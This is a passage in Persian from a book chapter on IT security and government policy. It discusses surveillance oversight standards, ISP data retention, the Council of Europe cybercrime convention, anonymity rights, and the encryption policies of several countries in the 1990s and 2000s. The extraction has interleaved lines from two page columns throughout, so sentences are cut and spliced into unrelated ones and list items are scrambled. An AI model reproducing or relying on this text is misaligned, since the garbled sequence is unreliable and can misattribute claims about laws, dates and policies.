ﺍﻳﻦ ﺿﻮﺍﺑﻂ ﺑﺎﻳﺪ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻛﻪ ﻃﺒﻴﻌﺖ ﺁﻧﻬﺎ ﺍﻳﺠـﺎﺏ .۲
ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺳﻴﺎﺳﺖ ﺍﺻﻠﻲ ﺍﺗﺤﺎﺩﻳﻪ ﺍﺭﻭﭘﺎ ﺍﺳـﺖ
ﻣﻲﻛﻨﺪ ﻧﻈﺎﺭﺗﻬﺎﻱ ﻗﻀﺎﻳﻲ ﻭ ﺳﺎﻳﺮ ﻧﻈﺎﺭﺗﻬـﺎﻱ ﻣـﺴﺘﻘﻞ ﺭﺍ
ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﺑﻨﺪ ۸ﻣﻌﺎﻫﺪﺓ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻮﺭﺩ ﺣﻘـﻮﻕ ﺑـﺸﺮ ﻧﻴـﺰ
ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﻧﺪ ،ﺑﺎﻋﺚ ﺗﻨﻈـﻴﻢ ﻛﺎﺭﺑﺮﺩﻫـﺎ ﺷـﻮﻧﺪ ،ﻭ ﺍﺳـﺒﺎﺏ
ﻛﺎﻫﺶ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺩﺍﻣﻨﻪﺍﻱ ﻭ ﺯﻣﺎﻧﻲ ﺭﻭﺍﻟﻬﺎ ﺭﺍ ﻓـﺮﺍﻫﻢ
ﻣﺸﺨﺺ ﺷﺪﻩ ﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﺑﻨـﺪﻫﺎﻱ ۷ﻭ ۸ﻣﻨـﺸﻮﺭ ﺣﻘـﻮﻕ
ﺍﺳﺎﺳﻲ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ٨٦ﺍﺣﺘـﺮﺍﻡ ﺑـﻪ ﺣﻘـﻮﻕ ﺧـﺎﻧﻮﺍﺩﻩ ﻭ ﺯﻧـﺪﮔﻲ
ﺁﻭﺭﻧﺪ.
ﺷﺨﺼﻲ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻋﻨﻮﺍﻥ ﻣـﻲﻧﻤﺎﻳـﺪ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻧﻈﺎﺭﺕ ﺩﺭ ﺟﻮﺍﻣﻊ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻭ ﺩﺭﺣﺎﻝ ﮔﺬﺍﺭ ،ﻧﻈﺎﺭﺕ ﺑﻲﺣـﺪ ﻭ ﻣـﺮﺯ
ﻼ ﺍﺯ
ﺩﻭﻟﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻔﻬﻮﻡ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﺍ ﻛـﺎﻣ ﹰ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﻗﺎﻧﻮﻥ ﻣﻌﻴﻦ ﻛﻨﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺍﻓﺮﺍﺩﻱ ﻛـﻪ ﺗﺤـﺖ ﺑﺮﺭﺳـﻲ • ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ .ﺗﺠﺮﺑﻴـﺎﺕ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ،
ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ -ﻣﺴﺘﻘﻞ ﺍﺯ ﻧﺘﻴﺠﺔ ﺣﺎﺻﻠﻪ -ﭘﺲ ﺍﺯ ﭘﺎﻳﺎﻥ ﺭﺍﻫﻨﻤــﺎﻱ ﻣﻔﻴــﺪﻱ ﺩﺭ ﺍﻳــﻦ ﻣﻮﺿــﻮﻉ ﻫــﺴﺘﻨﺪ .ﺑــﺮ ﺍﺳــﺎﺱ
ﻛﺎﺭ ﺑﺎﻳﺪ ﺍﺯ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻴﻬﺎ ﻣﻄﻠﻊ ﺷﻮﻧﺪ ﻳﺎ ﻧﻪ؛ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ،ﺭﻭﺷﻬﺎﻱ ﺯﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺭﺩﻳﺎﺑﻲ
ﻗﺎﻧﻮﻧﻤﻨﺪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻣﻤﻜﻦ ﺳﺎﺯﻧﺪ:
ﭼﻨﺎﻧﭽﻪ ﻃﺒـﻖ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻛـﺴﻲ ﺩﺭ •
ﺟﺮﻳﺎﻥ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺭﺩﻳﺎﺑﻲ ﻣـﻮﺭﺩ ﺗﺠـﺎﻭﺯ ﻗـﺮﺍﺭ ﺑﮕﻴـﺮﺩ، ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺭﺩﻳﺎﺑﻲ ﺷﻔﺎﻑ ﻭ ﻗﻮﺍﻧﻴﻦ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ •
ﻃﺒﻖ ﻗﺎﻧﻮﻥ ،ﺟﺒﺮﺍﻥ ﻛﻠﻴﺔ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺍﻟﺰﺍﻣﻲ ﺑﺎﺷﺪ. ﺑﺎﺷﻨﺪ؛ ﻭ ﺑﻄﻮﺭ ﻛﺎﻣـﻞ ،ﺑـﺼﻮﺭﺕ ﺷـﻔﺎﻑ ﻭ ﺑـﺎ ﻣﻮﺷـﻜﺎﻓﻲ
ﻻﺯﻡ ،ﺷﻬﺮﻭﻧﺪﺍﻥ ﺭﺍ ﺍﺯ ﭼﮕﻮﻧﮕﻲ ﻭ ﺷـﺮﺍﻳﻂ ﻧﻈـﺎﺭﺕ ﺁﮔـﺎﻩ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﺩﺭ ﺟﺮﻳـﺎﻥ ﺗﺤﻘﻴـﻖ ﻭ ﻫﻨﮕـﺎﻡ ﺗـﺼﺮﻑ ﺳﺎﺯﻧﺪ؛
ﻋﻮﺍﻣﻞ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ﺩﺭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ.
ﺗﺄﻳﻴﺪ ﺭﺩﻳﺎﺑﻲ ﺑﺼﻮﺭﺕ ﻛﺘﺒﻲ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻣﻘﺎﻡ ﻣﺴﺘﻘﻞ •
ﻧﮕﻬﺪﺍﺭﻱ ﺩﺍﺩﻩﻫﺎ ﻭ ﺳﺎﻳﺮ ﺍﺣﻜﺎﻡ ﺩﻭﻟﺖ )ﺗﺮﺟﻴﺤﹰﺎ ﻳﻚ ﻗﺎﺿـﻲ( ﺻﻮﺭﺕ ﮔﻴـﺮﺩ ﻭ ﺑـﺮ ﺍﺳـﺎﺱ ﺗﻘﺎﺿـﺎﻱ
ﻛﺘﺒﻲ ﻭ ﺍﺭﺍﺋﻪ ﺩﻻﻳﻞ ﻭ ﺍﺳﻨﺎﺩ ﻣﻌﺘﺒﺮ ﻭ ﻗﺎﺑـﻞ ﻗﺒـﻮﻝ ﺍﻧﺠـﺎﻡ
ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ )ﺍﺯ ﺟﻤﻠﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ( ﺿﻮﺍﺑﻂ
ﺷﻮﺩ؛
ﺧﺎﺻﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﺗﻠﻔﻨﻬﺎﻱ ﻣﻌﻤﻮﻟﻲ ﺍﻋﻤﺎﻝ ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﺩﺭ ﺑﻌﻀﻲ
ﻛﺸﻮﺭﻫﺎ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ )ISPﻫـﺎ( ٨٧ﺑﺎﻳـﺪ ﻛﻠﻴـﺔ ﻧﻈﺎﺭﺕ ﺗﻨﻬﺎ ﻣﺤـﺪﻭﺩ ﺑـﻪ ﺑﺮﺭﺳـﻲ ﺩﺭﮔﻴﺮﻳﻬـﺎﻱ ﺟـﺪﻱ ﻭ •
ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺭﺍ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺩﻭﻟﺖ ﻗﺮﺍﺭ ﺩﻫﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺧﺎﺹ ﺑﺎﺷﺪ؛
ﺍﻳﻦ ﺑﺮﺧﻲ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺩﺭﺻﺪﺩ ﺗﺼﻮﻳﺐ ﻗﻮﺍﻧﻴﻨﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺑـﺮ ﺗﺄﻳﻴﺪ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ ﺩﻻﻳﻞ ﻗـﻮﻱ ﻛـﻪ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ •
ﻣﺒﻨﺎﻱ ﺁﻥ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﻠﺰﻡ ﺑـﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﺩﺍﺩﻩﻫـﺎﻱ ﻟﺰﻭﻡ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻖ ﺩﺭﺑﺎﺭﻩ ﺗﺨﻠﻔﺎﺕ ﺍﺳﺖ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ؛
ﺗﺮﺍﻓﻴﻜﻲ ﺩﺭ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺮﺍﻱ ﻳﻚ ﺣﺪﺍﻗﻞ ﺯﻣﺎﻧﻲ ﻣﻲﺑﺎﺷﻨﺪ
ﺗﺄﻳﻴﺪ ﺭﺩﻳﺎﺑﻲ ﺗﻨﻬﺎ ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﻛﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ •
)ﺿﺎﺑﻄﻪﺍﻱ ﻛﻪ ﺑﻪ ﺁﻥ "ﻧﮕﻬﺪﺍﺭﻱ ﺩﺍﺩﻩﻫﺎ" ﺍﻃﻼﻕ ﻣﻲﺷﻮﺩ( .ﺍﻳـﻦ ﺿـﻮﺍﺑﻂ
ﺳﺎﻳﺮ ﻓﻨﻮﻥ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﻧﺒﺎﺷﺪ؛
ﺑﺴﻴﺎﺭ ﺑﺤﺚﺑﺮﺍﻧﮕﻴﺰ ﺑﻮﺩﻩ ﻭ ﺑـﻪ ﻋﻠـﺖ ﺗﻬﺪﻳـﺪ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ
ﺷﻬﺮﻭﻧﺪﺍﻥ ،ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪﻫﺎ ﻭ ﺗﺤﻤﻴﻞ ﻫﺰﻳﻨﻪﻫﺎﻱ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪ ﺍﺷﺨﺎﺹ ﻭ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺑﺎﻳﺪ ﺗﺤﺖ ﻧﻈﺮ ﻗـﺮﺍﺭ ﺑﮕﻴﺮﻧـﺪ ﺑـﺎ •
ﺑﺮ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ،ﻣﻮﺭﺩ ﺍﻧﺘﻘﺎﺩ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪﺍﻧـﺪ .ﺑﺮﺭﺳـﻲ ﺟﺰﺋﻴﺎﺕ ﻛﺎﻣﻞ ﻣﺸﺨﺺ ﺷﻮﻧﺪ ﻭ ﺩﺭ ﺍﻳﻦ ﺧـﺼﻮﺹ ﻣـﻮﺍﺭﺩ
ﻛﺎﻣﻠﺘﺮ ﺿﻮﺍﺑﻂ ﻧﻈﺎﺭﺕ ،ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺳﺖ .ﺑﺎ ﺍﻳـﻦ ﻛﻠﻲ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﻧﺒﺎﺷﻨﺪ؛
ﻭﺟﻮﺩ ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ ﺍﺳﺖ ﻛـﻪ ﻣﻌﺎﻫـﺪﺓ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺿﻮﺍﺑﻂ ﺍﺯ ﻧﻈﺮ ﻓﻨﺎﻭﺭﻱ ﺧﻨﺜﻲ ﺑﺎﺷﻨﺪ )ﺑﺎ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻋـﻢ •
ﺗﺨﻠﻔﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺑﻪ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ،ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﺯ ﺗﻠﻔﻨﻲ ،ﺗﺼﻮﻳﺮﻱ ،ﺩﺍﺩﻩ ﺧﻄﻮﻁ ﺳـﻴﻤﻲ ﻳـﺎﺑﻲ ﺳـﻴﻢ ،ﺩﻳﺠﻴﺘـﺎﻝ ﻳـﺎ
ﻓﻨﻲ ﻭ ﺍﻟﺰﺍﻣﺎﺕ ﻧﮕﻬـﺪﺍﺭﻱ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺗﺤﻤﻴـﻞ ﻧﻤـﻲﻛﻨـﺪ .ﺍﻳـﻦ ﺁﻧﺎﻟﻮﮒ ،ﺑﻪ ﻳﻚ ﺷﻜﻞ ﺑﺮﺧﻮﺭﺩ ﺷﺪﻩ ﺑﺎﺷﺪ(؛
ﻣﻌﺎﻫﺪﻩ ﺗﻨﻬﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ،ﺩﺳﺘﺮﺳـﻲ ﻳـﺎ ﺩﺳـﺘﻴﺎﺑﻲ
ﺣﻮﺯﻩ ﻭ ﻣﺪﺕﺯﻣﺎﻥ ﺍﻧﺠﺎﻡ ﻧﻈﺎﺭﺕ ﻣﺤﺪﻭﺩ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻫـﻴﭻ •
ﺑﻪﺩﺍﺩﻩﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺍﺭﺍﺋـﻪ ﻣـﻲﻛﻨـﺪ ﻭ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ
ﻣﻮﺭﺩﻱ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺯ ﺯﻣﺎﻥ ﻻﺯﻡ ﺑـﺮﺍﻱ ﻛـﺴﺐ ﺍﻃﻼﻋـﺎﺕ
ﺷﺮﻛﺘﻬﺎ ﺑﻬـﺮﻩ ﻣـﻲﺑـﺮﺩ .ﺍﻳـﻦ ﺍﻣـﺮ ﻧﻴﺎﺯﻣﻨـﺪ ﺗﻐﻴﻴـﺮ ﻓﻨـﺎﻭﺭﻱ ﻳـﺎ
ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﺒﺎﺷﺪ؛
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻧﻴﺴﺖ .ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ۲۰۰۲ﺩﺭﺑـﺎﺭﺓ
ﻣﺴﺎﺋﻞ ﺧـﺼﻮﺻﻲ ﺩﺭ ﺣـﻮﺯﺓ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻲ ﻣﻨﺘـﺸﺮ ﻞ ﻧﻘـﺾ ﺣـﺮﻳﻢ
ﻧﻈﺎﺭﺗﻬﺎ ﺑﻪ ﻃﺮﻳﻘﻲ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﻛﻪ ﺣﺪﺍﻗ ﹺ •
ﺳﺎﺧﺖ ﻛـﻪ ﺑـﻪ ﻛـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ﺍﺟـﺎﺯﺓ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻭﺳـﺎﻳﻞ ﺧﺼﻮﺻﻲ ﺭﺍ ﺩﺭ ﭘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛
ﻧﮕﻬــﺪﺍﺭﻱ ﺩﺍﺩﻩﻫــﺎ ﺭﺍ ﻣــﻲﺩﺍﺩ ،ﺍﻣــﺎ ﺁﻧﻬــﺎ ﺭﺍ ﻣﻠــﺰﻡ ﺑــﻪ ﺍﻳﻨﻜــﺎﺭ ﻗﻮﺍﻧﻴﻦ ،ﻛﺎﺭﺑﺮﺩ ﺍﻃﻼﻋـﺎﺕ ﺣﺎﺻـﻞ ﺍﺯ ﺭﺩﻳـﺎﺑﻲ ﺭﺍ ﺗﻮﺿـﻴﺢ •
ﻧﻤﻲﺳﺎﺧﺖ. ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ؛ ﻭ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﺩﻳﮕـﺮﻱ ﺑﻜـﺎﺭ
ﻧﺮﻭﻧﺪ؛
ﻗﺎﻧﻮﻥ ﺭﻭﺍﻟﻬﺎﻱ ﺻـﺪﻭﺭ ﺣﻜـﻢ ﺑـﺮﺍﻱ ﻣـﺘﻬﻢ ﺭﺍ ﻣـﺸﺨﺺ •
ﻛﺮﺩﻩ ﺑﺎﺷﺪ؛
87 Internet Service Providers
٢٥١ ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
٨٨
ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺩﺭ ﺧــﻂﻣــﺸﻲﻫــﺎﻱ ﺳــﺎﻝ OECD ۱۹۹۷ﻭ ﺩﺭ ﮔﻤﻨﺎﻣﻲ
ﮔﺰﺍﺭﺵ ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﻧﺎﻣﺤـﺪﻭﺩ
ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻮﺭﺩ ﺗﺨﻠﻔﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺣـﻖ ﻣﻬـﻢ
ﺑﻪ ﻣﺤﺼﻮﻻﺕ ﻭ ﺧﺪﻣﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻪ ﺷﺪﺕ ﺣﻤﺎﻳﺖ ﻣﻲﻛﻨﺪ.
ﺩﻳﮕﺮﻱ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻣﺸﺨﺺ ﻛﺮﺩﻩ ﺍﺳﺖ :ﺣـﻖ
ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ۱۹۹۰ﻛﺸﻮﺭﻫﺎﻱ ﻛﺎﻧﺎﺩﺍ ،ﺁﻟﻤﺎﻥ ،ﺍﻳﺮﻟﻨـﺪ ﻭ ﻓﻨﻼﻧـﺪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺼﻮﺭﺕ ﮔﻤﻨـﺎﻡ .٨٩ﮔـﺰﺍﺭﺵ ﺗﻔـﺴﻴﺮﻱ ﺍﻳـﻦ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﻠﻲ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ OECD ﻣﻌﺎﻫﺪﻩ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺍﺯ ﺍﺭﺍﺋﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﺗﻮﻗـﻊ
ﺗﻬﻴﻪ ﻛﺮﺩﻧﺪ ،ﺗﺎ ﺑﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺭﺍﻳﮕﺎﻥ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻛﻤـﻚ ﻛـﺮﺩﻩ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﺛﺒﺖ ﻧـﺎﻡ ﻣـﺸﺘﺮﻛﻴﻦ ﺧـﻮﺩ ﺭﺍ ﻧـﺪﺍﺭﺩ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺑـﻪ
ﺑﺎﺷــﻨﺪ .ﻓﺮﺍﻧــﺴﻪ ﻛــﻪ ﺳــﺎﺑﻘﻪﺍﻱ ﻃــﻮﻻﻧﻲ ﺩﺭ ﻣﺤــﺪﻭﺩﻛﺮﺩﻥ ﻣﻮﺟﺐ ﺍﻳﻦ ﻣﻌﺎﻫـﺪﻩ ،ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣﻠـﺰﻡ ﺑـﻪ ﺛﺒـﺖ
ﻼ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺷﺖ ﺩﺭ ﮊﺍﻧﻮﻳﻪ ﺳﺎﻝ ۱۹۹۹ﺍﻳﻦ ﺳﻴﺎﺳﺖ ﺭﺍ ﻛـﺎﻣ ﹰ ﺍﻃﻼﻋﺎﺕ ﻫﻮﻳﺘﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺸﺘﺮﻛﻴﻦ ﻭ ﻳﺎ ﻣﻘﺎﻭﻣـﺖ ﺩﺭ
ﺗﻐﻴﻴﺮ ﺩﺍﺩ ﻭ ﺍﻋﻼﻡ ﻛﺮﺩ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﻣﺤـﺪﻭﻳﺖ ﺑﺮﺍﺑﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻡ ﻣﺴﺘﻌﺎﺭ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻧﻤﻲ ﺑﺎﺷﻨﺪ .ﺷـﻮﺭﺍﻱ
ﺍﻧﺠﺎﻡ ﺷﻮﺩ .ﺩﺭ ﺩﺳﺎﻣﺒﺮ ،۱۹۹۷ﺑﻠﮋﻳﻚ ﻗﺎﻧﻮﻥ ﺳﺎﻝ ۱۹۹۴ﺧـﻮﺩ ﺍﺭﻭﭘــﺎ ﺩﺭ ﺳــﺎﻝ ۲۰۰۳ﺑﻴﺎﻧﻴــﻪﺍﻱ ﺭﺍ ﺩﺭ ﻣــﻮﺭﺩ ﺁﺯﺍﺩﻱ ﺍﺭﺗﺒﺎﻃــﺎﺕ
ﺩﺭ ﺧﺼﻮﺹ ﻣﺤﺪﻭﺩﻳﺖ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺭﺍ ﺍﺻـﻼﺡ ﻧﻤـﻮﺩ .ﺍﻳـﺎﻻﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺎ ﺍﻳﻦ ﻣﻀﻤﻮﻥ ﺑـﻪ ﭼـﺎﭖ ﺭﺳـﺎﻧﺪ" :ﺑﻤﻨﻈـﻮﺭ ﺍﻓـﺰﺍﻳﺶ
ﻣﺘﺤﺪﻩ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﺑﺎ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺗﺠﺎﺭﺕ ﻣﺤﺼﻮﻻﺕ ﻭ ﺍﻧﺘﺸﺎﺭ ﺁﺯﺍﺩ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﻳﺪﻩﻫﺎ ،ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﺑﺎﻳـﺪ ﺑـﻪ ﺍﻳـﺪﺓ
ﺧﺪﻣﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻩ ﺑﻮﺩ ،ﺗﻤﺎﻣﻲ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺣﺘﺮﺍﻡ ﺑﮕﺬﺍﺭﻧﺪ ﻭ ﻧـﻪ ﻫﻮﻳـﺖ ﺁﻧـﺎﻥ" .ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ،
ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﺩﺭ ﺳﺎﻝ ۲۰۰۰ﺭﻓﻊ ﻛﺮﺩ. ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺖ ﺑﺼﻮﺭﺕ ﮔﻤﻨﺎﻡ ﺭﺍ
ﺑﻪ ﺭﺳﻤﻴﺖ ﺷﻨﺎﺧﺖ ﻭ ﺑﺎ ﺍﻧﺘﺸﺎﺭ ﺑﻴﺎﻧﻪﺍﻱ ﺩﺭ ﻣـﻮﺭﺩ ﻧﺤـﻮﺓ ﺍﻳﺠـﺎﺩ
ﻗﺎﻧﻮﻥ ﻭ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ ﺍﻣﻦﺗﺮ ﺍﻇﻬﺎﺭ ﺩﺍﺷﺖ" :ﮔﻮﻧـﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪﻩﺍﻧـﺪ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺄﻳﻴﺪ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻣﺎ ﺩﺭ ﻣﺤﻴﻄﻲ ﻛﻪ ﺑـﺎ
ﻛﻪ ﻓﺸﺎﺭ ﺑﺎﺯﺍﺭ ﻣﺼﺮﻑ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣـﺆﺛﺮ ﺗﻬﺪﻳـﺪﺍﺕ ﺁﻥ ﺗﻌﺎﻣﻞ ﺩﺍﺭﻳﻢ ﻻﺯﻡ ﺍﺳﺖ .ﺩﺭ ﺑﻌﻀﻲ ﻣﺤﻴﻄﻬـﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ
